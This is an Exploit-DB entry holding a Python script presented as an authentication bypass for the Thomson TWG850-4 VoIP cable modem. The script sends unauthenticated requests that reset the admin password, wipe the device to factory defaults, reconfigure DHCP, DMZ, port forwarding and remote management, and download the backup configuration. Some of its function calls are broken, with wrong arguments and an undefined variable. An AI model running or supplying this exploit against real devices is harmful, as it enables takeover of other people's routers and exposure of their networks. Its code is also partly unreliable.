Thomson Wireless VoIP Cable Modem - Authentication Bypass

EDB-ID:

21417

CVE:





Platform:

Hardware

Date:

2012-09-20


# Exploit Title: Thomson Wireless VoIP Cable Modem Auth Bypass
# Date: February 22, 2011
# Author(s): Glafkos Charalambous, George Nicolaou
# Product: TWG850-4 Wireless VoIP Cable Modem
# Software Version: ST9A.01.06
# Severity: High
# Other Vulnerabilities: 
# Unauthenticated Backup File Access, 
# Plaintext Protocol succeptible to sniffing attacks

import argparse
import httplib
import urllib
import urllib2

def http_post( ip, port, request, params ):
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"en-us;en;q=0.5",
        "Accept-Encoding":"gzip, deflate",
        "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive":"115",
        "Connection":"keep-alive",
        "Content-type":"application/x-www-form-urlencoded"
        }
    con = httplib.HTTPConnection(ip,port)
    con.request("POST", request, params, headers)
    response = con.getresponse()

def block_domain( ip, port, host ):
    http_post( ip,port,
	       "/goform/RgUrlBlock",
               urllib.urlencode( {"cbDomainBlocking":"0x2","BasicParentalNewKeyword":0, "BasicParentalKeywordAction":0, "BasicParentalDomainList":0, "BasicParentalNewDomain":host,"BasicParentalDomainAction":1} )
               )
def block_keyword( ip, port, host ):
    http_post( ip,port,
	       "/goform/RgUrlBlock",
               urllib.urlencode( {"cbKeywordBlocking":"0x1", "BasicParentalNewKeyword":host,"BasicParentalKeywordAction":1, "BasicParentalNewDomain":"0", "BasicParentralDomainAction":0} )
               )
        
def password_reset( ip, port, user="admin", passwd="admin" ):
    http_post(ip,port,
              "/goform/RgSecurity",
              urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x00" })
              )

def factory_defaults( ip, port, user="admin", passwd="admin" ):
    http_post(ip,port,
              "/goform/RgSecurity",
              urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x01" })
              )

def dhcp_config( ip, port, localip="10.1.0.1", localsub="255.255.255.0", leasepoolstart="10.1.0.10", leasepoolend="10.1.0.100" ):
    http_post(ip,port,
              "/goform/RgSetup",
              urllib.urlencode({"LocalIpAddressIP":localip, "LocalSubnetMask":localsub, "DhcpServerEnable":"0x1000", "DhcpLeasePoolStartLAN":leasepoolstart, "DhcpLeasePoolEndLAN":leasepoolend, "LeaseTime":"604800" })
              )

def dyn_dns( ip, port, dnsuser="user", dnspass="pass", dnshost="host.dyndns.org" ):
    http_post(ip,port,
              "/goform/RgDdns",
              urllib.urlencode({"DdnsService":1, "DdnsUserName":dnsuser, "DdnsPassword":dnspass, "DdnsHostName":dnshost })
              )

def sntp_set( ip, port, server1="clock.via.net", tserver2="ntp.nasa.gov", tserver3="tick.ucla.edu" ):
    http_post(ip,port,
              "/goform/RgTime",
              urllib.urlencode({"TimeSntpEnable":1, "TimeServer1":tserver1, "TimeServer2":tserver2, "TimeServer3":tserver3, "TimeZoneOffsetHrs":0, "TimeZoneOffsetMins":0, "ResetSntpDefaults":0 })
              )

def backup_config( ip, port, fName="GatewaySettings.bin" ):
    u = urllib2.urlopen('http://' + ip+":"+port + '/GatewaySettings.bin')
    lFile = open(fName, 'w')
    print "File "+fName+" saved successfully"
    lFile.write(u.read())
    lFile.close()

def remote_manage( ip, port, status ):
   if status == 'enable':
    http_post(ip,port,
	      "/goform/RgOptions",
              urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbRemoteManagement":"0x80", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"})
              )	
   elif status == 'disable':
    http_post(ip,port,
              "/goform/RgOptions",
              urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"})
              )
   else:
    print "The argument you specified is not accepted"

def dmz_set( ip, port, dmzhost ):
    http_post(ip,port,
              "/goform/RgDmzHost",
              urllib.urlencode({"DmzHostIP3":dmzhost})
              )

def port_forward( ip, port, localip, startport, endport ):
    http_post(ip,port,
              "/goform/RgForwarding",
              urllib.urlencode({"PortForwardAddressLocal1IP3":localip, "PortForwardPortGlobalStart1":startport , "PortForwardPortGlobalEnd1":endport , "PortForwardProtocol1":"254", "PortForwardEnable1":"0x01"  })
              )

def main():
   status = ['enable', 'disable']
   argp = argparse.ArgumentParser(description='Thomson Cable Modem Auth Bypass v0.1')
   argp.add_argument("-pr", "--password_reset", nargs=2, help="Reset Admin Account", metavar=("user","pass"))
   argp.add_argument("-fd", "--factory_default", nargs=2, help="Reset Factory Defaults", metavar=("user","pass"))
   argp.add_argument("-bk", "--block_keyword", help="Block Web Access based on Keyword(s)", metavar="keywrd1,keywrd2,...,keywrdN")
   argp.add_argument("-bd", "--block_domain", help="Block Web Access to Specific Domain(s)",metavar="domain1,domain2,...,domainN")
   argp.add_argument("-dc", "--dhcp_config", nargs=4, help="Configure DHCP Settings",metavar=("localip","localsub","leasepoolstart", "leasepoolend"))
   argp.add_argument("-dd", "--dyn_dns", nargs=3, help="Configure Dynamic DNS",metavar=("user", "pass", "host"))
   argp.add_argument("-ss", "--sntp_set", nargs=3, help="Configure SNTP Settings",metavar=("timeserver1", "timeserver2", "timeserver3"))
   argp.add_argument("-bg", "--backup_config", help="Download Backup Configuration", metavar=("filename"))
   argp.add_argument("-rm", "--remote_manage", help="Enable Remote Config Management", metavar=("enable/disable"))
   argp.add_argument("-ds", "--dmz_set", help="Set DMZ Host. Use last 3 digits for IP Address", metavar=("ip"))
   argp.add_argument("-pf", "--port_forward", nargs=3, help="Configure Port Forwarding", metavar=("ip", "startport", "endport"))
   argp.add_argument("IP", help="IP Address")
   argp.add_argument("PORT", help="Port Number")
   args = argp.parse_args()
   if(args.password_reset != None):
       password_reset( args.IP, args.password_reset[0], args.password_reset[1] )
   if(args.factory_default != None):
       factory_default( args.IP, args.factory_default[0], args.factory_default[1] )
   if(args.block_keyword != None):
       for keyword in args.block_keyword.split(","):
           block_keyword(args.IP, keyword)
   if(args.block_domain != None):
        for domain in args.block_domain.split(","):
            block_domain( args.IP, domain )
   if(args.dhcp_config != None):
       dhcp_config( args.IP, args.dhcp_config[0], args.dhcp_config[1], args.dhcp_config[2], args.dhcp_config[3] )
   if(args.dyn_dns != None):
       dyn_dns( args.IP, args.dyn_dns[0], args.dyn_dns[1], args.dyn_dns[2] )
   if(args.sntp_set != None):
       sntp_set( args.IP, args.sntp_set[0], args.sntp_set[1], args.sntp_set[2] )
   if(args.backup_config != None):
       backup_config( args.IP, args.backup_config )
   if(args.remote_manage != None):
       remote_manage( args.IP, args.PORT, args.remote_manage )
   if(args.dmz_set != None):
       dmz_set( args.IP, args.PORT, int( args.dmz_set ))
   if(args.port_forward != None):
       port_forward( args.IP, args.PORT, args.port_forward[0], args.port_forward[1], args.port_forward[2] )
 
if __name__ == "__main__":
    main()